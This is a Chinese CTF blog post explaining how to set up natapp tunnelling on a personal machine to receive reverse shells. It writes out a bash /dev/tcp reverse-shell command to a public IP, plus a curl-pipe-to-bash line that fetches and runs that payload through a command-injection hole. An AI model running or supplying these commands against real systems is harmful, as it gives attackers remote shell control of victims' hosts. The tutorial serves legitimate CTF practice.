使用本机反弹shell

最新推荐文章于 2024-05-26 22:29:50 发布
最新推荐文章于 2024-05-26 22:29:50 发布
阅读量642 收藏 2
点赞数
分类专栏: 网络安全 CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/meteox/article/details/120106044
版权

有时候做题时懒得开服务器,或者服务器有问题用不了,都可以用本机做下内网穿透来进行反弹shell,或者得到一个公网可访问的web页面

我一般用natapp,使用起来比较简单方便

注册完成后配置下隧道本地要映射的端口

http隧道一般本地端口就设置为80,到时候本地开启phpstudy就可以直接使用。

tcp隧道根据你要监听的端口进行设置。

我这里tcp隧道的本地端口设置为1516。

下载它的客户端后直接在终端中执行命令

./natapp -authtoken=你的authtoken

image-20210904211649276

可以得到映射后的地址和端口

image-20210904211745294

然后进行本地监听即可

image-20210904211812658

可以ping server.natappfree.cc,得到ip更方便

反弹shell命令

bash -i >& /dev/tcp/112.74.89.58/37838 0>&1

当然也可以利用curl配合web页面进行反弹shell

在win中打开phpstudy,然后复制http隧道的authtoken,运行客户端进行穿透

image-20210904212030723

在php的web目录写入index.html

bash -i >& /dev/tcp/112.74.89.58/37838 0>&1

如果存在命令执行,就执行此命令

curl 795ggp.natappfree.cc | bash

即可反弹shell

image-20210904212424481

meteox
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1177
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
php反弹shell实现代码
10-30
遇到一个BT的网站,上传php文件成功之后,每访问一次,文件名就会随机改变一次,并且你访问当前文件如果点其他操作项,文件仍然会改名。
linux 反弹shell
weixin_30426957的博客
06-30 128
Linux下反弹shell笔记 0x00 NC命令详解 在介绍如何反弹shell之前,先了解相关知识要点。 nc全称为netcat,所做的就是在两台电脑之间建立链接,并返回两个数据流 可运行在TCP或者UDP模式,添加参数 —u 则调整为udP,默认为tcp -v 参数,详细输出 n参数高数netcat不要DNS反向查询IP的域名 z参数,连接成功后立即关闭连接 ...
反弹shell详细易懂讲解,看这一篇就够了
LCW991207的博客
05-26 1608
bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
反弹shell
litiammmm的博客
07-29 854
感谢:https://zhuanlan.zhihu.com/p/138393396 https://www.cnblogs.com/iouwenbo/p/11277453.html 什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端(普通人)发起请求到该端口,并将其命令行的输入输出转到控制端(黑客)。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹s.
什么是反弹 Shell
weixin_36888745的博客
07-07 546
简单来说,Shell 就是实现用户命令的接口,通过这个接口我们就能实现对计算机的控制,比如我们常见的 ssh 就是执行的 Shell 命令实现对远程对服务器的控制。
反弹shell小工具源码
10-12
依赖PHP环境。修改IP、端口,自动生成命令
Golang反弹shell使用邮件获取反弹地址)
09-29
使用邮件地址作为反弹shell服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like ...
c语言版本的反弹shell.zip
最新发布
06-13
c语言版本的反弹shell
不一样的视角剖析Linux 反弹shell水印版.pdf
08-02
为了更好地理解和掌握反弹shell,作者通过思维导图进行了框架整理,这有助于读者系统地了解各种反弹shell命令的原理、使用场景及检测方案。 4. **反弹姿势** 文档详细介绍了按照交互方式划分的五种类型的反弹...
Python 渗透测试:反弹 shell反弹 后门 || 程序免杀)
网络安全领域___专研者.
05-15 2109
反弹 shell (Reverse Shell) 是一种常见的渗透测试技术,它指的是受害者主机主动连接攻击者的主机,从而让攻击者获得对受害者主机的控制权。在一个典型的反弹 shell 攻击中,攻击者会在自己的主机上监听一个特定的端口,然后诱使目标主机主动连接到这个端口。当目标主机与攻击者的主机建立连接后,攻击者就可以通过这个连接获得目标主机的 shell 访问权限,从而进行进一步的渗透和控制。
什么是反弹shell
minibrid的分享页
10-15 750
反弹shell之前,先说说一个正常的场景,就是当我们需要连接一台远程服务器时,如果远端服务器IP可访问,并且启动了ssh服务器监听端口22,那么我们就可以在本地通过ssh客户端与远端ssh服务器的22号端口建立连接,这种方式叫做正向连接,即本地是客户端,远端是监听服务器。 有一种情况,当远端服务器在内网中,外部无法访问时,这个时候就可以用反弹shell,即在本地启动一个监听端口的服务器,然后在内网中的机器上客户端发起连接请求,客户端标准输入输出返回给本地服务器,以此实现远端操作的能力,往...
什么是反弹shell?如何使用反弹shell
10-30
使用反弹 Shell 可以在某些场景下方便地进行远程控制,例如在没有直接访问目标主机的权限时。反弹 Shell使用方法有很多种,其中一种常见的方法是使用 nc(netcat)工具,具体步骤如下: 1. 在攻击者主机上启动 nc...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值